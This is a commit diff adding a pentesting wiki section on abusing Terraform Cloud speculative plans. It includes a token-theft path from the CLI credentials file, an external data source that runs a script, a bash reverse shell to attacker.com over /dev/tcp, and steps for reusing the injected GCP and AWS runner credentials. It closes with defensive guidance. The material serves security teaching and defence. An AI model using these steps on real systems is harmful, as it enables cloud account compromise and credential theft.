Merge pull request #197 from HackTricks-wiki/update_Terraform_Cloud_token_abuse_turns_speculative_plan_20250815_124146

carlospolop · web-flow · commit 179d64772c35 · 2025-08-19T17:22:17.000+02:00
Terraform Cloud token abuse turns speculative plan into remo...
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
@@ -217,6 +217,94 @@ data "external" "example" {
 }
 ```
 
+## Terraform Cloud speculative plan RCE and credential exfiltration
+
+This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account.
+
+- Preconditions:
+  - Steal a Terraform Cloud token from a developer machine. The CLI stores tokens in plaintext at `~/.terraform.d/credentials.tfrc.json`.
+  - The token must have access to the target organization/workspace and at least the `plan` permission. VCS-backed workspaces block `apply` from CLI, but still allow speculative plans.
+
+- Discover workspace and VCS settings via the TFC API:
+
+```bash
+export TF_TOKEN=<stolen_token>
+curl -s -H "Authorization: Bearer $TF_TOKEN" \
+  https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
+```
+
+- Trigger code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace:
+
+```hcl
+terraform {
+  cloud {
+    organization = "acmecorp"
+    workspaces { name = "gcp-infra-prod" }
+  }
+}
+
+data "external" "exec" {
+  program = ["bash", "./rsync.sh"]
+}
+```
+
+Example rsync.sh to obtain a reverse shell on the TFC runner:
+
+```bash
+#!/usr/bin/env bash
+bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'
+```
+
+Run a speculative plan to execute the program on the ephemeral runner:
+
+```bash
+terraform init
+terraform plan
+```
+
+- Enumerate and exfiltrate injected cloud credentials from the runner. During runs, TFC injects provider credentials via files and environment variables:
+
+```bash
+env | grep -i gcp || true
+env | grep -i aws || true
+```
+
+Expected files on the runner working directory:
+- GCP:
+  - `tfc-google-application-credentials` (Workload Identity Federation JSON config)
+  - `tfc-gcp-token` (short-lived GCP access token)
+- AWS:
+  - `tfc-aws-shared-config` (web identity/OIDC role assumption config)
+  - `tfc-aws-token` (short-lived token; some orgs may use static keys)
+
+- Use the short-lived credentials out-of-band to bypass VCS gates:
+
+GCP (gcloud):
+
+```bash
+export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
+gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
+gcloud config set project <PROJECT_ID>
+```
+
+AWS (AWS CLI):
+
+```bash
+export AWS_CONFIG_FILE=./tfc-aws-shared-config
+export AWS_PROFILE=default
+aws sts get-caller-identity
+```
+
+With these creds, attackers can create/modify/destroy resources directly using native CLIs, sidestepping PR-based workflows that block `apply` via VCS.
+
+- Defensive guidance:
+  - Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners.
+  - Restrict `plan` permission on sensitive VCS-backed workspaces where feasible.
+  - Enforce provider/data source allowlists with Sentinel policies to block `data "external"` or unknown providers. See HashiCorp guidance on provider filtering.
+  - Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress.
+  - Detect exfiltration of `tfc-*` credential artifacts and alert on suspicious `external` program usage during plans.
+
+
 ## Automatic Audit Tools
 
 ### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
@@ -322,8 +410,13 @@ brew install terrascan
 - [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
 - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
 - [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce)
+- [Terraform Cloud token abuse turns speculative plan into remote code execution](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)
+- [Terraform Cloud permissions](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions)
+- [Terraform Cloud API – Show workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace)
+- [AWS provider configuration](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration)
+- [AWS CLI – OIDC role assumption](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc)
+- [GCP provider – Using Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud)
+- [Terraform – Sensitive variables](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables)
+- [Snyk Labs – Gitflops: dangers of Terraform automation platforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
